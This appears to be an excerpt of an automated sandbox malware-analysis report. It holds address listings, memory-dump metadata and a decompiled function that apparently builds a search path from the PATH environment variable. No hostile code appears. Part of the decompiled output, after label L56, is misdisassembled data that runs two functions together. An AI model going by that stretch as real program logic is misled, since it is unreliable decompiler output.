                                  0x1e415a87
                                  0x1e415a87
                                  0x1e415a8c
                                  0x1e415a91
                                  0x1e415a97
                                  0x1e415a9f
                                  0x1e415aa0
                                  0x1e415aa1
                                  0x1e415aa6
                                  0x1e415aab
                                  0x1e415ab1
                                  0x1e415ab3
                                  0x1e415ab9
                                  0x1e415aca
                                  0x1e415ad4
                                  0x1e415ad4
                                  0x1e415ade
                                  0x1e415ade
                                  0x1e415aab
                                  0x1e415a79
                                  0x1e415a52
                                  0x1e3d21f7
                                  0x1e3d21f9
                                  0x1e3d21fe
                                  0x1e3d21fe
                                  0x1e3d21e3
                                  0x1e3d2195
                                  0x1e3d236c
                                  0x1e3d2122
                                  0x1e3d2122
                                  0x1e3d2124
                                  0x1e3d2231
                                  0x1e3d2236
                                  0x1e3d2236
                                  0x1e3d2238
                                  0x1e3d2238
                                  0x1e3d2240
                                  0x1e3d2242
                                  0x1e3d2244
                                  0x1e4159fc
                                  0x1e3d218c
                                  0x1e3d218c
                                  0x00000000
                                  0x1e3d218c
                                  0x1e3d224a
                                  0x1e3d224f
                                  0x1e3d2256
                                  0x1e3d2304
                                  0x1e3d2309
                                  0x1e3d230f
                                  0x1e3d231e
                                  0x1e3d231e
                                  0x1e3d231e
                                  0x1e3d2320
                                  0x1e3d2325
                                  0x1e3d232a
                                  0x1e3d232c
                                  0x1e3d233e
                                  0x1e3d233e
                                  0x00000000
                                  0x1e3d232c
                                  0x1e3d2311
                                  0x1e3d2317
                                  0x1e3d231a
                                  0x1e3d231c
                                  0x1e3d2380
                                  0x1e3d2380
                                  0x1e3d2380
                                  0x1e3d2384
                                  0x00000000
                                  0x00000000
                                  0x1e3d2386
                                  0x00000000
                                  0x1e3d231c
                                  0x1e3d225c
                                  0x1e3d225c
                                  0x00000000
                                  0x1e3d225c
                                  0x1e3d212a
                                  0x1e3d2134
                                  0x1e3d2138
                                  0x1e3d213d
                                  0x1e415858
                                  0x1e415863
                                  0x1e415863
                                  0x1e415867
                                  0x1e41586a
                                  0x00000000
                                  0x00000000
                                  0x1e41586c
                                  0x1e41586c
                                  0x1e415871
                                  0x1e415875
                                  0x1e415877
                                  0x1e415997
                                  0x1e41599c
                                  0x1e4159a1
                                  0x1e4159a7
                                  0x1e4159a7
                                  0x00000000
                                  0x1e4159a7
                                  0x1e41587d
                                  0x00000000
                                  0x1e41588b
                                  0x1e41588b
                                  0x1e415890
                                  0x1e415892
                                  0x1e415894
                                  0x1e415899
                                  0x1e41589b
                                  0x1e4158a0
                                  0x1e4158a0
                                  0x1e4158aa
                                  0x1e4158b2
                                  0x1e4158b6
                                  0x1e4158be
                                  0x1e4158c6
                                  0x1e4158c9
                                  0x1e41590d
                                  0x1e415917
                                  0x1e41591a
                                  0x1e41591c
                                  0x1e415920
                                  0x1e415928
                                  0x1e41592a
                                  0x1e41592c
                                  0x1e41592e
                                  0x1e41592e
                                  0x1e4158cb
                                  0x1e4158cd
                                  0x1e4158d8
                                  0x1e4158e0
                                  0x1e4158f4
                                  0x1e4158fe
                                  0x1e4158fe
                                  0x1e41593a
                                  0x1e41593e
                                  0x1e415940
                                  0x1e415942
                                  0x00000000
                                  0x1e415944
                                  0x1e415944
                                  0x1e415949
                                  0x1e41594e
                                  0x1e41594e
                                  0x1e415953
                                  0x1e41595b
                                  0x1e415976
                                  0x1e415976
                                  0x1e41597a
                                  0x1e41597f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e415981
                                  0x1e415981
                                  0x1e415981
                                  0x1e415983
                                  0x1e415988
                                  0x1e41598d
                                  0x1e415991
                                  0x1e415991
                                  0x00000000
                                  0x1e41595d
                                  0x1e41595d
                                  0x1e415963
                                  0x1e415965
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e415967
                                  0x1e415967
                                  0x1e41596b
                                  0x1e41596d
                                  0x00000000
                                  0x00000000
                                  0x1e41596f
                                  0x1e415971
                                  0x1e415971
                                  0x1e415974
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e415974
                                  0x00000000
                                  0x1e415967
                                  0x1e41595b
                                  0x1e415942
                                  0x1e415863
                                  0x1e3d2143
                                  0x1e3d2143
                                  0x1e3d2149
                                  0x1e3d214f
                                  0x1e3d22f1
                                  0x1e3d22f6
                                  0x00000000
                                  0x1e3d2173
                                  0x1e3d2173
                                  0x1e3d217d
                                  0x1e3d2181
                                  0x1e3d2186
                                  0x1e4159ae
                                  0x1e4159b2
                                  0x1e4159b5
                                  0x1e4159b7
                                  0x1e4159ba
                                  0x1e4159cd
                                  0x1e4159d1
                                  0x1e4159d5
                                  0x1e4159d9
                                  0x1e4159db
                                  0x00000000
                                  0x00000000
                                  0x1e4159dd
                                  0x1e4159dd
                                  0x1e4159e1
                                  0x1e4159e4
                                  0x1e4159e7
                                  0x1e4159ee
                                  0x1e4159ee
                                  0x1e4159f3
                                  0x1e4159f3
                                  0x00000000
                                  0x1e3d2186
                                  0x1e3d214f
                                  0x1e3d2106
                                  0x1e3d2266
                                  0x1e3d20d8
                                  0x1e3d20da
                                  0x1e3d20e0
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID: `w
                                  • API String ID: 0-3428419808
                                  • Opcode ID: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
                                  • Instruction ID: 0894c606dbcced6f3b54fe8b63461358fe533190c7cae0ce0de803255c4534f0
                                  • Opcode Fuzzy Hash: 75855bb6545a8c1c3c6eac40a7732e60f339133ea872f77b1f11d8d088ffa8f0
                                  • Instruction Fuzzy Hash: 0EF1F832A183819FD715CF29C44075AB7E6BF85764F488B1EF8959B340D738E849CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E1E3D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t235;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				signed int _t271;
				signed int _t273;
				void* _t275;
				signed int _t276;
				unsigned int _t279;
				signed int _t283;
				signed int _t287;
				signed int _t291;
				intOrPtr _t304;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t321;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				void* _t333;

				_t327 = _t329;
				_t330 = _t329 - 0x4c;
				_v8 =  *0x1e49d360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t320 = 0x1e49b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t279 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t271 = 0x48;
				_t301 = 0 | _t333 == 0x00000000;
				_t313 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t321 = 0xc0000106;
						goto L32;
					} else {
						_t320 = L1E3C4620(_t279,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t320;
						__eflags = _t320;
						if(_t320 == 0) {
							_t321 = 0xc0000017;
							goto L32;
						} else {
							 *(_t320 + 0x44) =  *(_t320 + 0x44) & 0x00000000;
							_t50 = _t320 + 0x48; // 0x48
							_t315 = _t50;
							_t301 = _v32;
							 *(_t320 + 0x3c) = _t271;
							_t273 = 0;
							 *((short*)(_t320 + 0x30)) = _v48;
							__eflags = _t301;
							if(_t301 != 0) {
								 *(_t320 + 0x18) = _t315;
								__eflags = _t301 - 0x1e498478;
								 *_t320 = ((0 | _t301 == 0x1e498478) - 0x00000001 & 0xfffffffb) + 7;
								E1E3EF3E0(_t315,  *((intOrPtr*)(_t301 + 4)),  *_t301 & 0x0000ffff);
								_t301 = _v32;
								_t330 = _t330 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t315 = _t315 + (( *_t301 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E1E4339F2(_t315);
									_t301 = _v32;
									_t315 = _t265;
								}
							}
							_t283 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t321 = _v68;
								__eflags = 0;
								 *((short*)(_t315 - 2)) = 0;
								goto L32;
							} else {
								_t271 = _t320 + _t273 * 4;
								_v56 = _t271;
								do {
									__eflags = _t301;
									if(_t301 != 0) {
										_t230 =  *(_v60 + _t283 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t271 =  *(_v60 + _t283 * 4);
										 *(_t271 + 0x18) = _t315;
										_t234 =  *(_v60 + _t283 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2959))) {
												case 0:
													__ax =  *0x1e498488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49848c, __ax & 0x0000ffff);
														__eax =  *0x1e498488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E1E3EF3E0(_t315, _v80, _v64);
													_t260 = _v64;
													goto L26;
												case 2:
													 *0x1e498480 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e498484,  *0x1e498480 & 0x0000ffff);
													__eax =  *0x1e498480 & 0x0000ffff;
													__eax = ( *0x1e498480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E1E3EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E1E3EF3E0(_t315, _v76, _v36);
														_t260 = _v36;
													}
													L26:
													_t330 = _t330 + 0xc;
													_t315 = _t315 + (_t260 >> 1) * 2 + 2;
													__eflags = _t315;
													L27:
													_push(0x3b);
													_pop(_t262);
													 *((short*)(_t315 - 2)) = _t262;
													goto L28;
												case 6:
													__ebx =  *0x1e49575c;
													__eflags = __ebx - 0x1e49575c;
													if(__ebx != 0x1e49575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E1E3EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1e49575c;
														} while (__ebx != 0x1e49575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1e498478 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e49847c,  *0x1e498478 & 0x0000ffff);
													__eax =  *0x1e498478 & 0x0000ffff;
													__eax = ( *0x1e498478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E1E4339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1e496e58 & 0x0000ffff = E1E3EF3E0(__edi,  *0x1e496e5c,  *0x1e496e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1e496e58 & 0x0000ffff;
													__eax = ( *0x1e496e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t283 = _v16;
													_t301 = _v32;
													L29:
													_t271 = _t271 + 4;
													__eflags = _t271;
													_v56 = _t271;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t283 = _t283 + 1;
									_v16 = _t283;
									__eflags = _t283 - _v48;
								} while (_t283 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t313 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M1E3D2935))) {
							case 0:
								__ax =  *0x1e498488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t301 =  &_v64;
								_v80 = E1E3D2E3E(0,  &_v64);
								_t271 = _t271 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1e498480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E1E3BEEF0(0x1e4979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E1E3BEB70(__ecx, 0x1e4979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t321;
												if(_t321 < 0) {
													L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t279 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1e497b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E1E3BEB70(__ecx, 0x1e4979a0);
										__eax = _v52;
										L36:
										_pop(_t314);
										_pop(_t322);
										__eflags = _v8 ^ _t327;
										_pop(_t272);
										return E1E3EB640(_t209, _t272, _v8 ^ _t327, _t301, _t314, _t322);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t267 = _v56;
								if(_v56 != 0) {
									_t301 =  &_v36;
									_t269 = E1E3D2E3E(_t267,  &_v36);
									_t279 = _v36;
									_v76 = _t269;
								}
								if(_t279 == 0) {
									goto L44;
								} else {
									_t271 = _t271 + 2 + _t279;
								}
								goto L14;
							case 6:
								__eax =  *0x1e495764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1e498478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1e498478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1e496e58 & 0x0000ffff;
								__eax = ( *0x1e496e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t313 = _t313 + 1;
								if(_t313 >= _v48) {
									goto L16;
								} else {
									_t301 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					__eflags = _t234 - 0x3d28661e;
					_push(ds);
					asm("loopne 0x29");
					__eflags = _t234 - 0x3d262e1e;
					 *0x3d26051e =  *0x3d26051e - _t271;
					ds = ds;
					_t275 = ds;
					_push(ds);
					_t235 = _t330;
					_t332 = _t234;
					 *0x415b351e =  *0x415b351e - _t275;
					_push(ds);
					__eflags = _t235 - 0x3d28801e;
					_push(ds);
					__eflags = _t235 *  *_t315 - 0x3d281e1e;
					_push(ds);
					_t324 = _t320 + 1 - 1;
					 *0x3d275d1e =  *0x3d275d1e - _t275;
					_push(ds);
					asm("fcomp dword [ebx+0x41]");
					_push(ds);
					__eflags = 0x28 - 0x415c341e;
					_push(ds);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1e47ff00);
					E1E3FD08C(_t275, _t315, _t324);
					_v44 =  *[fs:0x18];
					_t316 = 0;
					 *_a24 = 0;
					_t276 = _a12;
					__eflags = _t276;
					if(_t276 == 0) {
						_t240 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t242 = 4;
						while(1) {
							_v40 = _t242;
							__eflags = _t242;
							if(_t242 == 0) {
								break;
							}
							_t291 = _t242 * 0xc;
							_v48 = _t291;
							__eflags = _t276 -  *((intOrPtr*)(_t291 + 0x1e381664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t257 = E1E3EE5C0(_a8,  *((intOrPtr*)(_t291 + 0x1e381668)), _t276);
									_t332 = _t332 + 0xc;
									__eflags = _t257;
									if(__eflags == 0) {
										_t325 = E1E4251BE(_t276,  *((intOrPtr*)(_v48 + 0x1e38166c)), _a16, _t316, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t242 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t242 = _t242 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t287 = _a4;
								__eflags = _t287;
								if(_t287 != 0) {
									_v36 = _t287;
									__eflags =  *_t287 - _t316;
									if( *_t287 == _t316) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t304 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t304 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t287;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t287) {
											__eflags =  *(_t304 + 0x1c);
											if( *(_t304 + 0x1c) == 0) {
												L106:
												_t325 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t316 = 1;
													_t287 = _v36;
													goto L75;
												}
											} else {
												_t247 = E1E3B6600( *(_t304 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t287 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E1E3D2C50(_t287, _a8, _t276, _a16, _a20, _a24, _t316);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t254 = E1E3D2AE4( &_v36, _a8, _t276, _a16, _a20, _t325);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E1E3D2C50(_v36, _a8, _t276, _a16, _a20, _t325, 1);
									}
									_v8 = _t316;
									E1E3D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t325;
					}
					L70:
					return E1E3FD0D1(_t240);
				}
				L108:
			}




















































                                  0x1e3d2584
                                  0x1e3d2586
                                  0x1e3d2590
                                  0x1e3d2596
                                  0x1e3d2597
                                  0x1e3d2598
                                  0x1e3d2599
                                  0x1e3d259e
                                  0x1e3d25a4
                                  0x1e3d25a9
                                  0x1e3d25ac
                                  0x1e3d25ae
                                  0x1e3d25b1
                                  0x1e3d25b2
                                  0x1e3d25b5
                                  0x1e3d25b8
                                  0x1e3d25bb
                                  0x1e3d25bc
                                  0x1e3d25bf
                                  0x1e3d25c2
                                  0x1e3d25c5
                                  0x1e3d25c6
                                  0x1e3d25cb
                                  0x1e3d25ce
                                  0x1e3d25d8
                                  0x1e3d25db
                                  0x1e3d25dd
                                  0x1e3d25de
                                  0x1e3d25e1
                                  0x1e3d25e3
                                  0x1e3d25e9
                                  0x1e3d26da
                                  0x1e3d26da
                                  0x1e3d26dd
                                  0x1e3d26e2
                                  0x1e415b56
                                  0x00000000
                                  0x1e3d26e8
                                  0x1e3d26f9
                                  0x1e3d26fb
                                  0x1e3d26fe
                                  0x1e3d2700
                                  0x1e415b60
                                  0x00000000
                                  0x1e3d2706
                                  0x1e3d2706
                                  0x1e3d270a
                                  0x1e3d270a
                                  0x1e3d270d
                                  0x1e3d2713
                                  0x1e3d2716
                                  0x1e3d2718
                                  0x1e3d271c
                                  0x1e3d271e
                                  0x1e415b6c
                                  0x1e415b6f
                                  0x1e415b7f
                                  0x1e415b89
                                  0x1e415b8e
                                  0x1e415b93
                                  0x1e415b96
                                  0x1e415b9c
                                  0x1e415ba0
                                  0x1e415ba3
                                  0x1e415bab
                                  0x1e415bb0
                                  0x1e415bb3
                                  0x1e415bb3
                                  0x1e415ba3
                                  0x1e3d2724
                                  0x1e3d2726
                                  0x1e3d2729
                                  0x1e3d272c
                                  0x1e3d279d
                                  0x1e3d279d
                                  0x1e3d27a0
                                  0x1e3d27a2
                                  0x00000000
                                  0x1e3d272e
                                  0x1e3d272e
                                  0x1e3d2731
                                  0x1e3d2734
                                  0x1e3d2734
                                  0x1e3d2736
                                  0x1e415bc1
                                  0x1e415bc1
                                  0x1e415bc4
                                  0x00000000
                                  0x1e415bca
                                  0x1e415bca
                                  0x1e415bcd
                                  0x00000000
                                  0x1e415bd3
                                  0x00000000
                                  0x1e415bd3
                                  0x1e415bcd
                                  0x1e3d273c
                                  0x1e3d273c
                                  0x1e3d2742
                                  0x1e3d2747
                                  0x1e3d274a
                                  0x1e3d274d
                                  0x1e3d2750
                                  0x00000000
                                  0x1e3d2756
                                  0x1e3d2756
                                  0x00000000
                                  0x1e3d2902
                                  0x1e3d2908
                                  0x1e3d290b
                                  0x00000000
                                  0x1e3d2911
                                  0x1e3d291c
                                  0x1e3d2921
                                  0x00000000
                                  0x1e3d2921
                                  0x00000000
                                  0x00000000
                                  0x1e3d2880
                                  0x1e3d2887
                                  0x1e3d288c
                                  0x00000000
                                  0x00000000
                                  0x1e3d2805
                                  0x1e3d280a
                                  0x1e3d2814
                                  0x1e3d2816
                                  0x00000000
                                  0x00000000
                                  0x1e3d281e
                                  0x1e3d2821
                                  0x1e3d2823
                                  0x00000000
                                  0x1e3d2829
                                  0x1e3d2829
                                  0x1e3d2831
                                  0x1e3d283c
                                  0x1e3d283e
                                  0x00000000
                                  0x1e3d283e
                                  0x00000000
                                  0x00000000
                                  0x1e3d284e
                                  0x1e3d2850
                                  0x1e3d2851
                                  0x1e3d2854
                                  0x1e3d2857
                                  0x1e3d285a
                                  0x1e3d285c
                                  0x1e3d285d
                                  0x00000000
                                  0x00000000
                                  0x1e3d275d
                                  0x1e3d2761
                                  0x00000000
                                  0x1e3d2767
                                  0x1e3d276e
                                  0x1e3d2773
                                  0x1e3d2773
                                  0x1e3d2776
                                  0x1e3d2778
                                  0x1e3d277e
                                  0x1e3d277e
                                  0x1e3d2781
                                  0x1e3d2781
                                  0x1e3d2783
                                  0x1e3d2784
                                  0x00000000
                                  0x00000000
                                  0x1e415bd8
                                  0x1e415bde
                                  0x1e415be4
                                  0x1e415be6
                                  0x1e415be8
                                  0x1e415be9
                                  0x1e415bee
                                  0x1e415bf8
                                  0x1e415bff
                                  0x1e415c01
                                  0x1e415c04
                                  0x1e415c07
                                  0x1e415c0b
                                  0x1e415c0d
                                  0x1e415c0d
                                  0x1e415c15
                                  0x1e415c18
                                  0x1e415c1b
                                  0x1e415c1b
                                  0x1e415c1e
                                  0x00000000
                                  0x00000000
                                  0x1e3d28c3
                                  0x1e3d28c8
                                  0x1e3d28d2
                                  0x1e3d28d4
                                  0x1e3d28d8
                                  0x1e3d28db
                                  0x1e415c26
                                  0x1e415c28
                                  0x1e415c2d
                                  0x1e415c2d
                                  0x00000000
                                  0x00000000
                                  0x1e415c34
                                  0x1e415c36
                                  0x1e415c49
                                  0x1e415c4e
                                  0x1e415c54
                                  0x1e415c5b
                                  0x1e415c5d
                                  0x1e415c60
                                  0x1e3d2788
                                  0x1e3d2788
                                  0x1e3d278b
                                  0x1e3d278e
                                  0x1e3d278e
                                  0x1e3d278e
                                  0x1e3d2791
                                  0x00000000
                                  0x00000000
                                  0x1e3d2756
                                  0x1e3d2750
                                  0x00000000
                                  0x1e3d2794
                                  0x1e3d2794
                                  0x1e3d2795
                                  0x1e3d2798
                                  0x1e3d2798
                                  0x00000000
                                  0x1e3d2734
                                  0x1e3d272c
                                  0x1e3d2700
                                  0x1e3d25ef
                                  0x1e3d25ef
                                  0x1e3d25ef
                                  0x1e3d25f2
                                  0x1e3d25f8
                                  0x00000000
                                  0x00000000
                                  0x1e3d25fe
                                  0x00000000
                                  0x1e3d28e6
                                  0x1e3d28ec
                                  0x1e3d28ef
                                  0x1e3d28f5
                                  0x1e3d28f8
                                  0x1e3d28f8
                                  0x00000000
                                  0x1e3d28f8
                                  0x00000000
                                  0x00000000
                                  0x1e3d2866
                                  0x1e3d2866
                                  0x1e3d2876
                                  0x1e3d2879
                                  0x00000000
                                  0x00000000
                                  0x1e3d27e0
                                  0x1e3d27e7
                                  0x1e3d27e9
                                  0x1e3d27eb
                                  0x1e415afd
                                  0x00000000
                                  0x1e415afd
                                  0x00000000
                                  0x00000000
                                  0x1e3d2633
                                  0x1e3d2638
                                  0x1e3d263b
                                  0x1e3d263c
                                  0x1e3d263e
                                  0x1e3d2640
                                  0x1e3d2642
                                  0x1e3d2647
                                  0x1e3d2649
                                  0x1e3d264e
                                  0x1e3d2650
                                  0x1e3d2653
                                  0x1e3d2659
                                  0x1e3d26a2
                                  0x1e3d26a7
                                  0x1e3d26ac
                                  0x1e3d26b2
                                  0x1e415b11
                                  0x1e415b15
                                  0x1e415b17
                                  0x00000000
                                  0x1e3d26b8
                                  0x1e3d26b8
                                  0x1e3d26ba
                                  0x1e3d27a6
                                  0x1e3d27a6
                                  0x1e3d27a9
                                  0x1e3d27ab
                                  0x1e3d27b9
                                  0x1e3d27b9
                                  0x1e3d27be
                                  0x1e3d27c1
                                  0x1e3d27c3
                                  0x1e3d27c5
                                  0x1e3d27c7
                                  0x1e415c74
                                  0x1e415c79
                                  0x1e415c79
                                  0x1e3d27c7
                                  0x00000000
                                  0x1e3d26c0
                                  0x1e3d26c0
                                  0x1e3d26c3
                                  0x1e3d26c6
                                  0x1e3d26c6
                                  0x1e3d26c9
                                  0x1e3d26c9
                                  0x00000000
                                  0x1e3d26c9
                                  0x1e3d26ba
                                  0x1e3d265b
                                  0x1e3d265b
                                  0x1e3d265e
                                  0x1e3d2667
                                  0x1e3d266d
                                  0x1e3d2677
                                  0x1e3d267c
                                  0x1e3d267f
                                  0x1e3d2681
                                  0x1e415b49
                                  0x1e415b4e
                                  0x1e3d27cd
                                  0x1e3d27d0
                                  0x1e3d27d1
                                  0x1e3d27d2
                                  0x1e3d27d4
                                  0x1e3d27dd
                                  0x1e3d2687
                                  0x1e3d2687
